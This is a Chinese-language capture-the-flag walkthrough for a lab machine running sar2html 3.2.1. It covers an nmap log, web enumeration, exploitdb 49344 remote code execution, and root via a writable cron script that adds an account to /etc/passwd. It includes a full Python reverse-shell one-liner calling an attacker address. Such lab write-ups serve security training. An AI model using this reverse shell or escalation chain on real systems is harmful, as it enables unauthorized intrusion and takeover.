防雷頁

可能的遺漏

• web 目錄常見檔案.
• web 頁面功能和版本.
• 進入機器後, 檢查機器排程.

摘要

• web 目錄常見檔案(robots.txt).
• web 頁面功能和版本(sar2html Ver 3.2.1) 在 exploitdb 有 exploit 可以用.
• 進入機器後, 檢查機器排程(/etc/crontab), 有一個定期排程的 bash script 可以修改.

Walkthrough

• 先透過 nmap 確認開什麼 port 和什麼服務(old log)

Starting Nmap 7.80 ( https://nmap.org ) at 2022-12-27 14:32 CST
NSE: Loaded 45 scripts for scanning.
Initiating Ping Scan at 14:32
Scanning 192.168.223.35 [2 ports]
Completed Ping Scan at 14:32, 0.27s elapsed (1 total hosts)
Initiating Connect Scan at 14:32
Scanning 192.168.223.35 [1000 ports]
Discovered open port 80/tcp on 192.168.223.35
Discovered open port 22/tcp on 192.168.223.35
Increasing send delay for 192.168.223.35 from 0 to 5 due to 62 out of 206 dropped probes since last increase.
Completed Connect Scan at 14:33, 18.64s elapsed (1000 total ports)
Initiating Service scan at 14:33
Scanning 2 services on 192.168.223.35
Completed Service scan at 14:33, 6.56s elapsed (2 services on 1 host)
NSE: Script scanning 192.168.223.35.
Initiating NSE at 14:33
Completed NSE at 14:33, 1.16s elapsed
Initiating NSE at 14:33
Completed NSE at 14:33, 1.10s elapsed
Nmap scan report for 192.168.223.35
Host is up (0.27s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.17 seconds

• dirb 掃描網站目錄
  

• 手動檢查網站
  

• 手動檢查網站(phpinfo.php 可以看一下, 有一些有用的資訊)
  

• 手動檢查網站(robots.txt 可以看一下, 有時候會有能用的資訊)
  

• 手動檢查網站(跟進 robots.txt 提示目錄, sar2HTML, 是功能頁面)
  

• exploitdb(search sar2html, 有 exploit 可以嘗試)
  

• exploitdb(49344 能用, 取得 shell)
  

• reverse shell

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.45.227",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'

• 使用 python 取得 pty shell
  python3 -c 'import pty; pty.spawn("/bin/bash")'

• get local.txt
  

• 檢查 /etc/crontab, 發現有趣的東西, 一路追蹤下去, 找到可寫入的 bash script
  

• 使用 openssl 產生要寫入 /etc/passwd 的密碼資訊
  

• 構造 bash script(這邊做法就非常多種, 請按照自己的喜好進行), 會寫入 /etc/passwd, 新增 root 權限的帳號(demo)
  

• 檢查 /etc/passwd, 確認帳號新增
  

• 登入 demo 高權限帳號
  

• get proof.txt
  

ref

• sar2html 3.2.1 - 'plot' Remote Code Execution - PHP webapps Exploit
• Linux Privilege Escalation - HackTricks